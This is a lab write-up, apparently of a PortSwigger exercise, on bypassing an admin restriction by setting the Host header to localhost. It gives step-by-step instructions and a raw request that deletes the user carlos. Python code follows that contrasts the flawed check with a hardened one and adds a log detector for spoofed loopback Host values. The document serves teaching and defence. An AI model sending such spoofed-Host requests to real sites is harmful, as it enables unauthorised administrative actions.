Accessing Restricted Functionality

Introduction

For fairly obvious reasons, it is common for websites to restrict certain functionality to internal users only. However, some websites' access controls make flawed assumptions, such as treating any request whose Host header names the local machine as internal, which allows you to bypass these restrictions by making simple modifications to the Host header. This can expose an increased attack surface for other exploits.

Authentication Bypass

  • Send the GET / request to repeater

  • Add /admin and send the request

  • Now, change the Host header to localhost

  • Delete the user carlos

GET /admin/delete?username=carlos HTTP/2
Host: localhost
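To show why the bypass above works and how the server side should look instead, here is an added example (not code from the lab or from PortSwigger) contrasting the flawed "Host == localhost means internal" check with a hardened one that validates Host against a configured allowlist and decides "internal" from the transport peer address, plus a small log check that flags loopback Host values arriving from external peers. The allowlisted vhost names, the request dictionaries and the log lines are constructed for this example, and the hardened check assumes the application is reached directly rather than through a reverse proxy.

```python
"""Host-header trust: flawed vs hardened admin gating, plus a log-based check."""
from typing import Dict, Iterable, List

LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}
LOOPBACK_PEERS = {"127.0.0.1", "::1"}
# Hypothetical configured virtual hosts for this deployment (constructed values).
ALLOWED_HOSTS = frozenset({"shop.example", "www.shop.example"})


def host_only(header: str) -> str:
    """Normalise a Host value: lowercase, drop the port, unwrap IPv6 brackets."""
    h = header.strip().lower()
    if h.startswith("["):                      # e.g. "[::1]:8080"
        return h[1:h.index("]")]
    return h.rsplit(":", 1)[0] if h.count(":") == 1 else h


def is_internal_flawed(environ: Dict[str, str]) -> bool:
    """The assumption the lab exploits: a loopback Host header means the caller
    is internal. Host is client-controlled, so anyone can set it."""
    return host_only(environ.get("HTTP_HOST", "")) in LOOPBACK_HOSTS


def is_internal_hardened(environ: Dict[str, str]) -> bool:
    """Refuse unknown Host values instead of falling through to a default vhost,
    then decide 'internal' from REMOTE_ADDR, which the HTTP client cannot rewrite
    (assumes no reverse proxy in front of the application)."""
    if host_only(environ.get("HTTP_HOST", "")) not in ALLOWED_HOSTS | LOOPBACK_HOSTS:
        return False
    return environ.get("REMOTE_ADDR", "") in LOOPBACK_PEERS


def suspicious_host_requests(log_lines: Iterable[str]) -> List[str]:
    """Detection: return paths where a loopback Host header arrived from a
    non-loopback peer. Lines are constructed as '<peer_ip> <host_header> <path>'."""
    hits = []
    for line in log_lines:
        peer, host, path = line.split()
        if host_only(host) in LOOPBACK_HOSTS and peer not in LOOPBACK_PEERS:
            hits.append(path)
    return hits


# Constructed sample access log: one legitimate request, one spoofed-Host request.
SAMPLE_LOG = [
    "203.0.113.7 shop.example /product?id=1",
    "203.0.113.7 localhost /admin/delete?username=carlos",
]

if __name__ == "__main__":
    spoofed = {"HTTP_HOST": "localhost", "REMOTE_ADDR": "203.0.113.7"}
    print("flawed grants admin:", is_internal_flawed(spoofed))        # True
    print("hardened grants admin:", is_internal_hardened(spoofed))    # False
    print("flagged paths:", suspicious_host_requests(SAMPLE_LOG))
```

Network position is a weak proxy for authorisation in any case; the administrative endpoint should additionally require an authenticated administrator session.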
